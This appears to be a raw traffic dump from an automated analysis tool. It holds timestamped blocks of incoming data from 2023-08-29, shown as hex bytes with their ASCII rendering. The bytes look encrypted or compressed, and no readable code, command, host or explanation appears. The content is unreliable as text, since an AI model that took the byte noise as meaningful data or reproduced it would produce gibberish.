                                                                                                                  2023-08-29 17:16:41 UTC316INData Raw: b6 30 f0 7a 75 60 30 64 0d 2c c3 14 0d 55 59 fe 47 e6 75 64 9d 38 bd 13 70 a5 59 54 99 38 d0 d5 6d 3d 59 a3 74 6c a6 17 53 25 01 dc c9 49 29 1f 41 ef 83 41 dd 5f d1 1f de a9 c9 94 9d f6 3a cd dc db 5d 56 ff 6c ba 37 5c fd 30 6f 4d 2c 27 fe 9d 3c 09 54 9f 33 d5 13 cb 09 f3 c1 ea 6b 23 52 e9 2f 3a 3f 9a e2 fd 51 2d ac b2 a9 05 ec a9 97 cc ea 3c d7 58 ed 3c 12 57 2f 3f 74 59 64 f4 d9 2d 85 90 d7 69 25 76 54 de f9 b0 57 18 5e 71 1f d0 f9 f6 14 c5 6d c3 d6 53 85 cc 5a 9b 7e 3d 06 1f 6b 59 5c 70 e9 e5 23 9c 5d 45 4c dd 48 37 51 cd 2f cc 93 f5 e4 35 73 e3 dd 71 56 1e 04 f3 7e 9f 4f f2 c9 d9 ef e1 36 5e f0 bb 27 ba 77 70 4a 5e 38 3d 06 9f 24 59 02 4f ee a1 f7 df d6 0d 3c 9f 6c 12 18 df 8e c0 37 5c 6f 10 40 f5 76 b5 5e 6b 49 e9 63 5e ee ff 64 9d ee 11 af 5c 62 35
                                                                                                                  Data Ascii: 0zu`0d,UYGud8pYT8m=YtlS%I)AA_:]Vl7\0oM,'<T3k#R/:?Q-<X<W/?tYd-i%vTW^qmSZ~=kY\p#]ELH7Q/5sqV~O6^'wpJ^8=$YO<l7\o@v^kIc^d\b5
                                                                                                                  2023-08-29 17:16:41 UTC320INData Raw: ee cb e9 f4 ee 80 82 db c9 e6 b6 f4 ef e7 56 f4 ef e4 30 bd ed cc 2a 34 ed cc 2d 79 6d 95 45 ae 0f 0d 2c 64 2c c7 82 f9 79 4e 00 ac b8 4d 03 6c 6d cf 32 77 ef 52 81 f5 2c 9b 82 f6 4d 4e 00 a5 6e cc c9 74 ec 88 44 75 bf 9e 05 a4 8d 76 e6 b0 ef ac 45 4c 58 8a 03 90 55 bb 45 f6 8b 9b 81 f8 3d 0e 03 ab ae c1 d5 74 ec a2 24 77 ef 02 86 a6 b5 6b 42 ad 95 31 58 37 ec b2 82 77 e5 cf 97 d6 6e cc 85 a1 6d cf 0b 77 ef 46 81 f5 13 4d 03 78 ca 4e 00 35 cb 8e 7e b0 d6 0e 10 fb 6a ed 00 ae ad cd 41 4d e9 cf a4 9f 24 de 00 7f 61 c2 40 ce d6 0f 0e d0 68 67 c1 f5 e2 79 01 ac 75 c1 81 43 a1 ea 39 fb 52 07 40 f1 eb 5d 00 c7 ae c5 c1 f1 e2 71 45 20 e9 b6 40 f3 cd 8e 06 f7 ad 6a 03 90 76 cf 15 36 77 8e 00 ee af cc 45 4c 6d e0 80 75 e1 cd c7 b0 e9 e6 d7 be ee 48 6b 71 fe 0e 33
                                                                                                                  Data Ascii: V0*4-ymE,d,yNMlm2wR,MNntDuvELXUE=t$wkB1X7wnmwFMxN5~jAM$a@hgyuC9R@]qE @jv6wELmuHkq3
                                                                                                                  2023-08-29 17:16:41 UTC324INData Raw: 5d 2d 8a 12 4d 65 c3 a1 e5 ec 99 08 03 36 31 dc b8 30 72 9b 91 a1 53 57 5a ec b1 53 5d 9f ba 5f d6 28 b9 de 5d 28 4d dc 10 61 38 1a a5 ed 3a 02 51 ee 5b 56 d4 3d b1 57 20 95 b1 21 4c e6 f4 ab d5 ab b1 57 ed 68 32 96 5c fd b9 ab b6 b7 01 55 ec 69 1e 47 52 6d be 57 52 6d 4e 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 f8 52 6d be 57 51 6d 84 04 50 5d b1 2f 6d 6d 6b cf ad 2c 29 e3 1c d8 b0 59 32 6e b7 57 e6 dc 90 26 5d 1f c1 54 bc 74 84 57 35 9d b1 0d 31 5d b1 27 ac 2b 01 1e d5 5f e6 23 35 04 df 2e 3d fc dd a7 d6 ad d1 22 5d 01 d4 79 39 01 dd 57 02 6c d0 56 02 08 c3 36 2e 08 ee b6 0c 6f f6 14 09 21 80 54 2c 20 83 19 25 49 dc 39 98 21 70 10 a8 21 44 00 73 73 d4 a4 5d dc ba 66 51 9e b0 73 27 17 61 2d 39 0f d6 23 04 0d c3 56 ad 20 59 73 6d 5c 90 56 3d 6c 1c
                                                                                                                  Data Ascii: ]-Me610rSWZS]_(](Ma8:Q[V=W !LWh2\UiGRmWRmNX]bX]bX]bX]bRmWQmP]/mmk,)Y2nW&]TtW51]'+_#5.="]y9WlV6.o!T, %I9!p!Dss]fQs'a-9#V Ysm\V=l
                                                                                                                  2023-08-29 17:16:41 UTC328INData Raw: 23 12 73 ad 59 71 9b 7e c3 e9 0d 6e 96 70 de 8f b6 2f 01 26 88 f3 7a 6b f7 35 fb 65 1f ac c4 4e 49 b3 7a 7a 29 3e 81 c4 58 49 23 5d 73 fd e6 eb 90 e3 d8 57 2e cf da dd 59 4f 06 ca f8 d9 0d 8d 48 31 cd 33 01 e5 d3 7c f8 e8 ba 3e 6e f3 0a 7e 5d 29 d7 94 6a d1 03 f8 65 64 c0 01 7e df 2b 62 8f ec 8d 72 17 d8 dc d9 a5 2e 8a ef 05 78 7b 35 7d 5a 12 1a cf 24 e7 93 3d 05 cf 4f d4 24 14 c4 b7 3a 51 a5 51 1d 9b b5 18 e3 1f e0 0a 28 b4 cc a6 d1 be 22 c5 53 f0 34 31 cd e9 98 49 bf 87 cf d4 95 b3 f1 fb f7 15 6d e0 90 cb c9 6d 15 64 59 a6 54 60 9c fa e1 9b 28 25 ae e1 f0 46 92 2d cf dd a8 5b 09 35 6f 8a 0c aa 5c ba 29 bc b9 57 fa 86 23 89 2b aa f4 91 0a c1 30 94 ab 11 7e e2 6b e8 e3 44 0d d6 c9 42 0d c4 b6 75 5c 52 8a ed 7d 52 01 ae 54 f0 f7 b4 c0 9b f2 d1 6e 86 0a 19
                                                                                                                  Data Ascii: #sYq~np/&zk5eNIzz)>XI#]sW.YOH13|>n~])jed~+br.x{5}Z$=O$:QQ("S41ImmdYT`(%F-[5o\)W#+0~kDBu\R}RTn
                                                                                                                  2023-08-29 17:16:41 UTC332INData Raw: a5 62 0b f3 16 be 19 1c 37 56 65 eb c3 7c d3 2e 31 78 3a 34 0f 9a 05 64 70 82 0d 0c 5d a7 0f 5a 01 53 61 1a 37 6f eb 6f da ee 9a 0f 33 82 57 9f 86 57 a9 ed eb 43 96 36 68 00 26 42 94 07 ba f3 da 8c 18 82 75 13 b0 18 0d 02 00 c2 11 a2 54 60 1b fa ae 72 0b d7 61 80 00 02 3c 82 91 73 18 36 bc 34 e7 77 a2 6e ef c3 1e 22 56 64 f7 dc 35 e9 68 d8 24 16 cd 84 35 ea 93 b1 4a 62 f0 dc 2b 95 cb 9e 1d d4 c4 9a ed a0 4f 56 56 e9 fc 9c 06 df d4 14 a7 ae 6e 02 9e 45 7d 15 a3 b8 f4 19 5d 46 e1 a2 1e fe 10 50 01 c0 a6 d5 0d 14 df e1 20 3e c8 e1 50 31 43 64 be 6f 6b 1a 8d 90 5b 0e 67 39 83 87 c6 10 c9 9d 76 59 a8 c2 8f 0b 1f be 7f 5b d1 4e 65 73 c3 7c d3 00 57 83 9a d0 a7 92 05 25 cd 8c f6 c8 f0 93 23 5a 0b 35 6e 3d da cf bf ae d2 ee fc 41 97 0f 73 67 07 d3 8d 83 ee b8 02
                                                                                                                  Data Ascii: b7Ve|.1x:4dp]ZSa7oo3WWC6h&BuT`ra<s64wn"Vd5h$5Jb+OVVnE}]FP >P1Cdok[g9vY[Nes|W%#Z5n=Asg
                                                                                                                  2023-08-29 17:16:41 UTC336INData Raw: 14 95 39 45 97 5c 99 c8 bb 86 40 8c e5 fd 80 dd e1 dc 88 20 7e a0 5b a0 e6 e4 ad 9c e3 13 e8 46 90 33 5c 49 11 07 cd c0 92 77 ff e2 70 75 da 8e 1a ef 45 e7 2e b1 ac 03 1f 8b 2a e2 45 3e b6 75 34 3a 33 85 57 25 0a 4e f5 57 fb bb cb 3c c9 dd 11 80 6a d4 7b f2 b1 74 c1 31 55 93 aa 8e 5c 19 dd 0a 08 ee 37 0b c2 cc f7 60 79 f0 8b 65 78 30 7e 15 bc b7 83 fd 83 83 40 ac 78 99 ee 94 ce f4 db 73 b8 4b b8 97 ea e9 ca 2f 47 bb 5b ba e7 cf e3 1f 8c 66 e8 76 f2 c8 60 df bd 17 4b 61 6a cd 2e 7e 1e ab b5 ce 01 c4 b7 b6 11 6c df 52 a2 f5 93 f9 86 a4 73 61 30 e5 8c aa 91 f0 8c b5 ce 08 b0 c4 70 2d 92 53 92 85 b7 1f 72 88 f1 64 95 ce f6 d6 4c 8e f3 c1 ed a4 a0 dd 8d 92 73 1c 86 29 cd 26 a1 31 82 43 21 71 8a 63 9c 6e f7 6f 0c 0b 73 db fd ac 50 31 10 64 6a aa 74 2d 23 19 9f
                                                                                                                  Data Ascii: 9E\@ ~[F3\IwpuE.*E>u4:3W%NW<j{t1U\7`yex0~@xsK/G[fv`Kaj.~lRsa0p-SrdLs)&1C!qcnosP1djt-#
                                                                                                                  2023-08-29 17:16:41 UTC340INData Raw: 28 a3 5f 34 4d 19 21 88 2f 19 10 3d a4 28 61 79 b1 e3 70 a1 4b 64 ff 21 a0 95 99 f8 32 82 4c a8 c7 a3 f6 5e 3b d8 52 31 60 49 bb fb 57 b1 6f 5b 48 cd 68 cf ee 3c dc 61 72 23 ee a8 bf 92 05 64 9d c1 d2 a0 76 08 07 1e 8a 71 ea 91 38 3f 1f 7e 53 1d 3d c3 43 87 84 ee 49 5a 98 54 25 56 08 56 21 ca e7 80 eb 4c 4c a4 3f 8f 1e b3 8b 44 6c a7 00 e4 11 20 12 93 e8 6c 28 fa 8e a3 f2 d6 b0 e7 ce e4 f4 22 31 32 9b f6 db 7f 95 32 ce b3 e7 c9 1e 44 2c a8 3b 75 41 c5 48 d0 65 ae c4 3c 35 fa db 3c 8a cf 31 3e 36 7a f8 4c bc c9 58 9b fd e8 26 9a ff dd d0 bc 1e 9e 0f 54 1f e6 f7 86 ba 4d 77 fa a1 f0 dc 5a ff ee c9 a2 1e bf cb 51 01 37 2f 41 29 fc d9 fe 20 3a 28 94 9c 39 b7 9b 41 ad 77 e4 f8 2b 7a 09 cf a5 ab af c6 51 5a ad 97 f9 72 90 a9 fb 86 f6 fe d7 70 ea 41 8b 91 23 8d
                                                                                                                  Data Ascii: (_4M!/=(aypKd!2L^;R1`IWo[Hh<ar#dvq8?~S=CIZT%VV!LL?Dl l("122D,;uAHe<5<1>6zLX&TMwZQ7/A) :(9Aw+zQZrpA#
                                                                                                                  2023-08-29 17:16:41 UTC344INData Raw: b9 8d a7 a5 f3 1b 18 05 e4 35 fb 2f 7d c1 9a 60 90 27 93 61 40 ab 75 8c cd 2f a1 69 f8 56 0f 40 39 f0 e4 af 24 f1 81 cc d4 dd fc 84 42 77 d1 45 93 08 8d f7 a2 d9 a8 e5 ac 1d 5f 53 36 2d 20 a6 2b 13 ea b8 c3 6f a3 c7 2d 78 d5 0d 1c e1 00 bf 68 9f 76 ab b6 f0 6c 35 4a ef 4e 21 e3 c0 5e 4b 96 7d 04 6f bd 3c b6 3d b4 70 92 bf 54 25 0a 2f 02 33 e8 50 2d 3e c2 8b dc fd ad 1c 7b c6 77 ae 62 f1 99 5f 5c 84 15 2b 12 c6 c4 0b 3d 42 f1 8e 00 b8 4a bd 07 21 f7 22 3b 78 b0 77 a3 3b c6 b2 bc 23 9e 5a a2 1d cf c0 2e e4 f2 2c 7a df 68 2d 0b a0 0a b3 1f 7f 73 42 a3 2a 46 23 f3 72 32 ff b5 96 de 98 c5 6d 2c c1 6a 4d 65 65 79 a5 c7 8c 3e f8 df ad 5d 1f b2 b1 68 6d 13 eb 46 ab 75 ed 88 6a ab 25 c5 d6 7f 86 bc 89 64 69 a1 76 44 49 d9 d9 3a 01 87 b2 54 4b bb ce 08 2c 67 5c a7
                                                                                                                  Data Ascii: 5/}`'a@u/iV@9$BwE_S6- +o-xhvl5JN!^K}o<=pT%/3P->{wb_\+=BJ!";xw;#Z.,zh-sB*F#r2m,jMeey>]hmFuj%divDI:TK,g\
                                                                                                                  2023-08-29 17:16:41 UTC348INData Raw: 7a 3c c6 0f 06 53 52 92 fa 4c 9e 82 53 e1 ea e8 26 e7 b4 cc 8f 9b 06 9e 7d d3 22 9a e0 86 ba b1 b2 90 de f7 9d 9d 53 28 6c dc 19 bf cb 60 c7 0d 50 56 29 fc b6 27 a5 f6 a6 65 74 c8 8d e1 3f 29 b0 1b b8 1e b7 00 44 81 8b b6 00 d4 91 9b 76 11 2c 80 2e 7f 11 be 7f 5a 9e 47 c4 8c ca 7c bc 8e bb 81 b9 10 af dc c3 e1 91 8a f6 80 48 d1 82 d2 06 35 6e 44 75 ce 12 61 da ee d6 c6 c9 84 74 2f 8e 38 6f 0e 6f bf 02 12 c8 ce a3 ce f5 08 c5 2e 38 c9 9d 85 75 75 a0 25 0c a8 d7 ca 11 c2 f4 ea eb 79 8a a2 4a 11 e4 76 08 6d b8 c6 d7 ff 89 31 da 3b 52 35 03 1c e0 c3 1e 0d 9f 9e e0 ff d5 e1 1a 1e e0 3a 82 84 35 a4 1d b9 53 41 c0 d6 56 53 7f da f2 44 d6 bd 2b 6d b1 d5 72 49 bd 5a 83 06 08 15 a7 cc 21 03 23 a2 74 15 92 36 18 07 7e ee e9 cd d8 3a 50 56 01 88 09 97 ac 60 d1 e1 20
                                                                                                                  Data Ascii: z<SRLS&}"S(l`PV)'et?)Dv,.ZG|H5nDuat/8oo.8uu%yJvm1;R5:5SAVSD+mrIZ!#t6~:PV`
                                                                                                                  2023-08-29 17:16:41 UTC352INData Raw: ad b6 26 57 67 f6 c9 b1 3b e8 2b e9 98 d8 62 21 a7 77 8f 70 03 33 b5 c7 26 ed 39 2c 7f 7f 3a ed f8 57 34 de 8a 23 03 16 ba a6 4c 70 3c 46 c5 83 88 2f 90 f2 95 f9 b5 98 c2 83 47 69 ce ae ed c4 4e ef e8 a2 05 d7 47 7d 93 85 60 69 d4 88 44 49 d4 de 3a 01 b3 b2 54 44 bc ce 08 54 67 5c aa 96 6a 98 a2 96 b3 2e 54 60 ae f3 2f 3d c7 58 65 42 c3 bd 50 08 36 27 85 1d ad 1a 70 e6 70 75 cf f0 cf e8 46 e7 66 50 9b ce 9e 72 c2 ea 68 f9 33 34 bc b6 17 79 91 a0 00 05 c4 b6 62 95 a8 35 ca 4d 59 34 68 99 77 f1 b1 2b 87 34 1c 52 65 42 90 cd d7 43 ca 21 fb c7 1a 4b 85 b7 3e 7b 82 55 35 a7 2b 27 76 f2 ff f9 43 a3 92 e5 1b 4c 60 98 dd b3 e8 61 e1 ee ff cc 60 eb 8e d0 c8 36 0b 32 b5 c7 8e e8 c3 36 ca b4 b7 d3 77 13 c8 d5 03 e8 14 03 ef 5a 4f a3 fc d9 05 09 26 f7 19 28 09 dd 37
                                                                                                                  Data Ascii: &Wg;+b!wp3&9,:W4#Lp<F/GiNG}`iDI:TDTg\j.T`/=XeBP6'ppuFfPrh34yb5MY4hw+4ReBC!K>{U5+'vCL`a`626wZO&(7
                                                                                                                  2023-08-29 17:16:41 UTC356INData Raw: 2d 13 85 c6 a9 72 3b f2 e4 3f 05 60 85 ae ce 2f 7a b8 e5 d3 f3 0f af 4e 93 ed 5f 1b 73 b0 5c 6d 4c 50 65 ae 85 cc b8 67 32 3d c6 46 88 5f a7 b1 7a 4c f5 44 9e 16 60 69 24 d2 72 01 7d d0 22 e6 47 98 2a 17 e4 86 ba ed fd 59 87 80 d5 10 f4 47 ee a2 1e f7 42 1d 25 e0 67 dc a4 15 d2 e1 20 3e 28 29 50 e1 07 ed e2 0a e8 53 00 55 bb 84 43 81 c3 0e 8a 75 42 d0 ff 65 05 0e e7 72 6a 9a 3f 5f d1 a6 65 b3 86 f5 bf 6c 0e 4f 33 9d ae 91 05 64 5e 04 ba a4 51 5f 8e 1e 25 15 26 f8 be 5d 1d 62 da 54 fc 10 4c 0e 9b d3 86 57 a9 4d 61 98 07 12 a8 08 6e cf 67 29 c0 67 fe 8a 95 a3 70 75 bf f4 4f a3 f2 cf 11 a2 25 a9 e1 5d 8f a2 03 b6 a7 63 2b 68 b8 a6 5e bc 9d 13 df 3b 1c a2 40 0b c1 c6 1e 44 08 dd f6 df d0 e1 68 d4 ef 2b a5 81 35 ea 73 3d c9 c3 2d d4 2b 95 70 c9 d4 41 d6 9b e2
                                                                                                                  Data Ascii: -r;?`/zN_s\mLPeg2=F_zLD`i$r}"G*YGB%g >()PSUCuBerj?_elO3d^Q_%&]bTLWMang)gpuO%]c+h^;@Dh+5s=-+pA
                                                                                                                  2023-08-29 17:16:41 UTC360INData Raw: 6f 03 25 6b a5 3f 9b 4c 8d 45 d9 3b 84 c5 0e a7 d1 b6 26 ab 87 e3 1e c0 89 d4 19 63 ca a8 2a 6e b2 d6 3f 7b 5a d7 2b 2d 93 e5 dd 5c 9d 1d 86 33 17 71 83 19 33 52 34 ea c7 2f 02 97 57 b0 4f c7 b6 2e 46 51 d2 fc 3c b8 49 de 5d 17 fb a0 02 04 22 ce b5 83 8f e5 8a 0f f9 dc 55 a1 ae 53 3b 70 f0 29 10 e3 42 e2 fc d8 6a a3 29 c1 8d 55 cb 60 62 da 3e 28 fd 40 df 8d 8a 9c 65 c2 fb f1 18 31 b5 26 15 83 a3 d9 e0 1c a9 73 2b 19 f1 e8 a8 9f 51 18 d8 63 2a 22 9a bd 27 93 cc 72 ca d8 6d 9d a4 9d 76 29 bc b9 57 b3 98 9b 49 64 9c 39 28 46 2e 15 ad 84 23 d4 e3 85 db d9 79 22 94 64 83 d6 85 35 f3 ad 6c c9 11 f5 3d 6e c0 7b 37 7f bc 8f 35 f1 99 50 79 02 90 94 98 04 85 e3 19 cf cf 65 18 fc 32 cd 9b 60 c2 e1 7c 17 62 6b e6 b6 16 73 71 ed 5a 99 4c 05 8b bf 5e 38 f0 6d 4b 0c 20
                                                                                                                  Data Ascii: o%k?LE;&c*n?{Z+-\3q3R4/WO.FQ<I]"US;p)Bj)U`b>(@e1&s+Qc*"'rmv)WId9(F.#y"d5l=n{75Pye2`|bksqZL^8mK
                                                                                                                  2023-08-29 17:16:41 UTC364INData Raw: 19 5d 10 97 2f f3 dd 6a 09 11 33 a0 9e 8b f4 91 4b 12 2d 69 e9 f1 3f 14 8d fa 2e c5 22 f9 14 2f 7a 56 98 a9 f8 ee bf 1b 40 5e c6 2b f2 e6 b3 af 86 85 50 c6 82 7a 18 f0 9e 1f 3c 73 ce 07 1e 8f 97 b6 18 92 9b 10 28 11 97 27 ec 76 44 6c 2d 62 9f 18 e6 cf 18 17 c3 85 72 08 d1 65 5e e7 c9 ca ae 8e 56 6a b0 15 ef da 86 fd 66 0e ff 0e fe 81 50 51 2a 18 5c 75 69 66 ad 86 3b 37 a7 75 27 00 63 75 0e b8 5f 00 64 ff 41 a4 9c 99 c3 20 9a 06 f4 92 6d 19 da 92 cb c5 af ae 4e 3d 36 b6 fe 5d 05 6d ef 72 ee 7f 97 06 d0 86 65 a7 8e f5 2b 89 d6 0a 36 54 8b bf 41 ed ee 4c 1e 85 f1 53 23 74 40 f5 89 76 f7 c3 e7 42 f5 a6 75 f9 00 87 81 6e 36 47 a9 8b e4 50 6f e2 57 f7 ad 4d 79 4f c1 ee 34 8d fa 9a fd 63 36 29 48 cc c0 42 47 a3 ba 01 66 f6 c4 a1 8a 16 a0 0f 17 e5 f6 a2 98 bb d9
                                                                                                                  Data Ascii: ]/j3K-i?."/zV@^+Pz<s('vDl-bre^VjfPQ*\uif;7u'cu_dA mN=6]mre+6TALS#t@vBun6GPoWMyO4c6)HBGf
                                                                                                                  2023-08-29 17:16:41 UTC368INData Raw: 15 89 80 85 08 8d a9 1c bd 75 f0 b3 6c d8 51 4f 60 38 51 4f 92 89 80 12 bd 75 89 b7 45 e2 e4 b3 6c b6 26 ba 0d d6 cb 14 f5 cf e5 c5 85 4b e5 ec 82 2f 30 f9 3f 47 c5 14 f5 ce 3d b6 cb a3 c3 da 78 aa 05 fa d9 2e c6 4a 2a 45 a3 f6 ec 2f c6 4f e7 03 10 41 ad bd 00 14 f5 7e cc 99 a3 fc 7a 88 ed 6d 1a 27 57 5e 4e b1 f9 ce 05 b9 16 df c1 50 ac c1 01 c3 95 90 de 5a ef d9 ff f4 db ef 8c 37 7a d2 58 f1 ed 8c e1 e3 ea ca 3d e4 e5 ce d4 04 d3 79 de 7c ab fb 01 07 d1 99 29 05 15 7e 0f f4 aa 4a 02 d0 41 b0 c7 0b ed 52 84 1c 4a b7 0e 23 d4 ce 88 3b 65 e4 0e 58 df da 01 46 d1 33 3a 3a e7 2b 9e f4 5c ea 80 ec 1a 06 67 46 ed e0 50 72 6e 83 1e 66 4e ce c2 c4 bd 0c 26 5d d6 e4 01 52 3c 19 60 63 b0 a6 20 f4 bd 8e a2 d5 4c 1b 61 67 ed 8c 91 58 ee 24 b5 f0 af ce d6 e8 a4 95 b3
                                                                                                                  Data Ascii: ulQO`8QOuEl&K/0?G=x.J*E/OA~zm'W^NPZ7zX=y|)~JARJ#;eXF3::+\gFPrnfN&]R<`c LagX$
                                                                                                                  2023-08-29 17:16:41 UTC372INData Raw: ec 2e 94 3a 1c 2b 8a d0 41 4b 01 c4 7b 42 37 e3 d6 72 d6 f4 13 3a b8 59 f8 7e e0 bc ed d9 e1 1e 26 bc a4 18 b5 ce 1b 5d 76 09 e9 14 a1 e0 01 2f 7a b0 58 b5 4c a8 9a bb 0a 6d 48 d7 e0 6e 20 2f c8 d2 b1 e9 c7 af 5e fd 5d 5a 4a 57 e3 b4 ce 23 66 ba aa fe 5d 9c 4f 17 4b 31 b7 ae da 6d 5a 5c ef 44 c6 ca 40 b8 b1 a7 95 e5 fa d4 7b 64 16 57 b3 35 fa 39 61 f5 9f 1c 5d ee a4 72 ba 65 74 46 0f 6d 9c 28 24 80 c7 6b 9b 89 b1 c4 8b ab 2f 38 d5 64 70 57 f1 b6 f7 2b 47 9a a5 1c 5d be 6f 13 14 4f 0d af ba 6d e8 be 77 85 ca 5c 1a d7 b1 25 75 7a 4a b7 1a ba d9 57 ac e6 d0 19 01 b2 df 30 5d 27 bf 36 92 67 80 24 04 6d 9e 1c 41 9a e3 06 08 2c b1 cb c7 c0 0d b3 32 78 1e 57 28 19 c5 fb 31 0c 2d f4 5d 39 9b eb c1 e1 94 ee 31 6d 7e d4 65 54 ea e7 fc 17 b1 ad 72 0a 66 97 5b 18 03
                                                                                                                  Data Ascii: .:+AK{B7r:Y~&]v/zXLmHn /^]ZJW#f]OK1mZ\D@{dW59a]retFm($k/8dpW+G]oOmw\%uzJW0]'6g$mA,2xW(1-]91m~eTrf[
                                                                                                                  2023-08-29 17:16:41 UTC376INData Raw: 37 38 51 4f f3 8d a9 f9 bd 75 43 b7 45 b8 e4 b7 45 5c 51 4f 02 8d a9 3f bd 75 bc 02 bd 75 a4 b7 45 1a 51 4f a3 8d a9 de 08 8d a9 ed bd 75 35 b7 45 b6 26 73 0d d6 64 a1 0d d6 4a 14 f5 b6 e1 ec fa 2e 19 4b b8 2e 19 20 0d d6 52 10 dc 20 e1 ec e3 9b e1 ec c3 2a 30 a3 0d d6 b6 84 e1 b7 54 00 f5 28 71 f8 c3 be 0d ec 19 d6 2d a1 9d c2 09 84 e1 ec f5 ec 62 be 0d f8 b8 be 0d ae 19 d6 58 84 e1 03 71 f8 37 9b f5 ec de be 0d 98 9d c2 40 00 f5 49 54 84 e1 68 71 f8 17 3a 19 82 9d c2 4e a1 9d c2 27 00 f5 90 71 f8 4e be 0d 5a b8 3a 19 69 9d c2 a6 84 e1 b0 f5 ec 8c 9b 71 f8 88 be 0d 54 19 d6 4b 80 e1 3b 20 05 f5 e3 5d 20 95 be 0d ad c6 ce 96 c7 d8 1b 7a c8 75 d8 01 7e 61 5f 20 07 fa 8b d7 b5 9d f0 77 af 07 de 3e 84 d3 17 01 94 dc d2 dc 88 95 d6 c6 f4 56 92 f4 a7 59 12 70
                                                                                                                  Data Ascii: 78QOuCEE\QO?uuEQOu5E&sdJ.K. R *0T(q-bXq7@IThq:N'qNZ:iqTK; ] zu~a_ w>VYp
                                                                                                                  2023-08-29 17:16:41 UTC380INData Raw: 8b 04 5b a4 1a 0d a6 c4 c9 19 26 12 eb 67 fd a8 15 08 ba 81 2c 1f e4 63 f8 61 1e 46 59 49 a1 55 38 e6 65 3c dd 3e c8 95 70 82 b4 b1 51 d3 91 cf 18 90 a9 e2 d8 b8 85 fd 1c 82 6c 9b 08 6d d2 2f 7a c0 15 8c e0 fd a1 30 f2 85 fd 79 b2 cf 83 46 6f b9 48 8f ce 2f 88 f5 84 1a a0 ca 9c 7d 2f d4 54 df 61 dd a4 b4 34 2f e2 ae 12 ff ac da 78 63 0b 74 1f 69 b6 66 43 7e 25 70 09 d3 ad a5 07 55 ce ee 71 ce d7 06 05 fe b2 7c c5 5d 16 8e 85 ab 55 a7 d8 be 3d 9d cb 3b d4 ae ff d7 a2 9e b8 00 70 68 a2 18 ac a5 40 d4 ff 89 dc f2 81 62 1a 54 f3 6a e4 3e 8d e9 a9 1d c0 63 0d 24 61 ab 97 1c bd aa a5 0c 28 6d 4f 86 39 c4 52 56 73 ce 73 90 f6 db 36 ad 7e af 32 44 8c 73 62 58 73 57 0f 63 db fd 8d 03 78 31 5f b4 f4 b8 48 57 0d e0 c0 82 5e 8f d1 7a e7 66 60 c7 4c 56 44 f6 f2 28 ed
                                                                                                                  Data Ascii: [&g,caFYIU8e<>pQlm/z0yFoH/}/Ta4/xctifC~%pUq|]U=;ph@bTj>c$a(mO9RVss6~2DsbXsWcx1_HW^zf`LVD(
                                                                                                                  2023-08-29 17:16:41 UTC384INData Raw: 7f fc d3 d7 3f 00 e2 11 8c b8 83 49 bb 4a 90 13 4e 20 03 2f c2 16 c8 d0 67 e5 51 26 d0 1b eb 7c 2a 93 7e 7f d9 82 8d 61 de 90 87 db c0 fc 43 3e f1 df ab da 08 5b a9 ef 5e e7 32 43 16 93 b9 92 01 b6 26 a6 c0 e0 77 af 5b 99 4e 7e 8b fd 56 e3 68 bf 07 bb 13 b6 8e e1 0f d7 2c 40 c1 c1 ac e1 43 ff 5c a2 93 aa 1e 97 88 76 8f 8f d8 bb d8 b0 cc 60 d0 d1 46 f1 c6 69 57 16 0a cb ca 2c 35 1c 68 83 56 e1 f1 03 cf e7 5a da 9d 8c d1 75 cd c3 a0 93 c4 b1 88 70 f1 bd ca 60 62 16 7c 0a 74 c2 a1 86 56 90 f2 c5 7d e9 df 7f b0 8e 75 11 06 66 86 07 15 31 3b e6 a1 1c bd 63 a5 20 b1 51 fc 7e c7 a7 b2 25 b9 43 a7 c0 99 9b 39 43 02 4a bc 7d 0b 70 99 a3 97 be cc 92 25 8c 13 ae 92 58 7f 6d 55 24 ce 5c d4 7c a7 a0 95 d8 b4 31 09 73 33 50 99 9c 67 dd 15 8f 7a 68 e8 b1 03 62 1b be 34
                                                                                                                  Data Ascii: ?IJN /gQ&|*~aC>[^2C&w[N~Vh,@C\v`FiW,5hVZup`b|tV}uf1;c Q~%C9CJ}p%XmU$\|1s3Pgzhb4
                                                                                                                  2023-08-29 17:16:41 UTC388INData Raw: c3 59 20 db ab 6a ea 06 47 8a 64 e2 20 13 6f e4 36 70 c8 d6 da 68 2b 73 c6 08 de 08 5d 43 e0 fb b9 14 4e 37 67 7a bb ce 30 df e1 9a f8 69 82 f1 37 93 46 17 53 59 1f cd 12 b1 90 63 8a 3c a2 27 dc 42 62 46 99 49 04 52 fe a2 3d df 4f dc 0e 2f 7a 28 0a 1c 54 aa ad 49 00 90 00 2d cf ba c6 41 79 4d 04 dd 0e e0 fa d7 cd 84 31 a7 b9 fd 61 30 58 82 77 3d ec 29 af 63 e7 3c cc 8f b4 e9 b4 d0 0c 1a a0 ac c8 f8 6c 74 7c 29 a2 dc ab a1 01 9a b6 aa 8f f1 1a 08 f5 29 f0 7b 00 ed b6 4f 96 f7 cf fc d4 58 a2 1a da 8a 40 c1 d8 3e 9e 1c 84 35 60 1f 99 1e 1e f3 27 79 dc 7b a6 aa 5b a3 22 bc 2a 8b b7 eb 73 7c 60 a8 6d 1b 5d 9b 6e 65 77 e9 09 78 ab ce 03 8f a7 93 1f 95 e4 13 0c 27 45 e4 dc 22 f6 4e 62 32 84 13 0b f1 ef ae e6 3e bb 22 d8 f2 bb 53 f3 13 84 f0 96 a3 26 47 76 2c 31
                                                                                                                  Data Ascii: Y jGd o6ph+s]CN7gz0i7FSYc<'BbFIR=O/z(TI-AyM1a0Xw=)c<lt|)){OX@>5`'y{["*s|`m]newx'E"Nb2>"S&Gv,1
                                                                                                                  2023-08-29 17:16:41 UTC392INData Raw: 4d 55 5a f5 2d d9 0e 48 38 33 0b 87 07 19 fd d7 5d 69 2f 04 d4 e9 31 05 06 fe db f8 81 a7 72 57 29 61 24 33 a3 d3 bb 83 24 b5 58 9b 65 14 ef a4 fd f1 0a cd 59 8e b4 33 4e 20 03 2f c3 76 c8 d0 67 e6 01 26 d0 1b ea 68 2a 93 7e 78 ee 82 8d 61 df b6 26 47 db 42 9c 66 63 a7 ad 46 f6 7c 18 c2 f5 7e eb b9 25 7b 09 21 23 4f f3 c8 a5 07 3c 3d b0 e3 48 df 26 10 96 e4 43 9d 2a 88 da 4d 63 a6 87 12 e9 9b 11 69 83 b5 66 0e 9c a5 b8 88 2f a1 41 85 62 34 53 bc 76 9b 3e dc 10 94 b3 4c 4d 6e f1 35 16 58 0d a0 14 45 2f 45 12 c1 b9 7f bf 63 f3 ee 9c 8b 7c 59 7d 03 4e 1d 30 61 c9 7c 75 73 